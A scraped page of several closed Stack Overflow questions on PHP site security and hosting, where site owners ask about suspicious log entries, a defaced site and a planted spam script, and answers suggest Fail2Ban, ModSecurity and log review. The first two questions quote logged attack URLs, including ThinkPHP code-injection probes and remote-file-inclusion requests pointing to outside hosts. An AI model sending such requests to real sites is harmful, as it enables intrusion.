Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 1 year ago.
Improve this question
I am receiving malicious request therefore i seek your help i log page urls visited and some of them are like http://example.com/?a=fetch&content=<php>die(#md5(HelloThinkCMF))</php> and some are like http://example.com/?XDEBUG_SESSION_START=phpstorm and one more like http://example.com/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&var what are these user trying to do and how should I improve the security and take precaution
It seems the users are trying to use URL injection to attack your website. They are adding malicious code to urls and sending them to the web server. If this code is run by the Php process, then it can cause damage to databases or the file system.
I faced a similar problem. I was able to fix the problem by installing Fail2Ban and ModSecurity. ModSecurity is an open source Web Application Firewall. It allows blocking malicious requests using predefined rules. Fail2Ban is a server intrusion prevention tool that checks for certain text patterns in log files using regular expressions. It automatically adds rules to the system's firewall, banning the user.
See these blog posts on how to install Fail2ban and Modsecurity.
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 2 years ago.
Improve this question
I have some security issue with my website. It started by creating wp-admin directory on my FTP server with malicioust .txt file. index.php was also changed (some code at the beginning was added)
I changed all passwords and completely deleted the CMS folder from the server. I removed also wp-admin directory and malicious code from index.php
Lots of unauthorized connections to my website started with this change.
Detalis here:
database log
All calls to .shtml files were blocked by .htaccess file.
Unfortunately there are still attempts to access other resources
for example:
/wp-load.php?daksldlkdsadas&
/ajax-index.php?url=http://domainnamespace.top/lf.jpeg
/aindex.php?daksldlkdsadas&
/wp-load.php?WordPress=newzealandpolicy.wang/popn.txt&Database=1index.php
/sitemapimages79.xml
/sitemapimages5.xml
How can i prevent this calls?
What kind of attack is it and what is its purpose?
It's not wordpress based website
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 6 years ago.
Improve this question
My website is entirely written by me in php on notepad, no WordPress or the like. The only known weakness is that due to a complicated hardware situation, I can not use HTTPS for the login area. It runs on a shared hosting account at iPage. It's 'LAMP'.
I am setup to monitor reasons why the 404 page is called. This is where my concern comes. Someone is making attempts on folders in all lower case. This more alarming because these folders words are in the login area sometimes. For example, if I have a file at /loginArea/myHidden/index.php these odd requests are aimed at /myhidden for some reason. Notice no caps and lack of the first directory. This has been happening at a rate of one per day, from random IP addresses all around the world. You might assume this was a coding mistake on my part at first, but I am 100% certain that has been ruled out by now. They are moving around my folder structure, poking like they are searching for something.
They seem to be limited to folder words they could sniff from http traffic of logged in users. They have not hit one that is known only to me.
No damage seems to have been done, but I am getting DAILY attempts and want to know what they are hoping for.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
Improve this question
I built a Website using PHP and want to deploy it on internet. I want to know what is the best option as to host on web server or cloud and what will be pros and cons doing that.
Resources needed for my site:
PHP
Mysql
Apache or lighttpd
My site is simple CMS with 10 pages (max).
A web server has defined hardware specifications, meaning that if too many users try to access it, it will fail to answer their requests.
Cloud hosting providers will restrict you in what you can do (what language, what APIs you can access, ...), but they usually allow for automatic scaling, meaning: If the first instance's ("server's") load exceeds a certain limit, a second instance may start automatically to handle half of the load, and so on.
A single server often is sufficient for PHP sites, but you may suffer the slashdot effect, i. e. a sudden peak of attention to your site may bring it down quickly.
You didn't specify the kind of application you are going to deploy and kind of resources you application need. Anyhow below are the points you need to consider to decide cloud vs non-cloud.
1) Availability
2) Scalability
3) Security
4) Cost effective
Prons:
1) Security
2) Limited control.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
I made a PHP based webapp and a customer of my needs it on his website. Now I want to put the PHP code on my server and let the customer's website include it remotely. How do I set this up? And can I restrict the acces when the customer doesn't need the app anymore and is it secure?
There is nothing such as remote PHP. Doesn't work that way. However you can setup some API to communicate between the two servers on backend. You'd still need both servers to be capable of this interaction, that means both servers still need to be fully functional. And if your code on client's server can talk to your API on host server, then they can take that code and see how it interacts with your host and replicate it.
A very simple solution would be to put the PHP-generated content from your website in an <iframe> on their website.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
Seomeone placed script in my site that send email, how I cant found this script ?
I use parallels and Linux CentOs.
I'm search keyword in site "mail(", but also cant be that code is like hash
It could be anywhere, and it could be anything. It could even have been deleted.
We did have a situation a while back where a client lost control of their password due to a keylogger and someone was uploading a CGI script to spam emails, running it then deleting it. We only found out via FTP logs what was going on.
Try checking your ftp logs, web server logs and if all that fails and you are sure it is php then try searching for eval( as that is an often used tactic to hide what a script is doing.
More importantly though, my suggestion would be to get someone who is experienced in server management to have a look at your site as a matter of urgency. If they were able to upload a file to your site once, then even if you remove it, it won't stop them doing it again until you find exactly how they were able to do it.
You might also have a look at your scripts. Is there a contact form somewhere on your site? You might have not escaped userinput very well, which gives an attacker the ability to send mails to other recipients.
I had a similar situation in my early days until the host blocked the script and told me to fix it.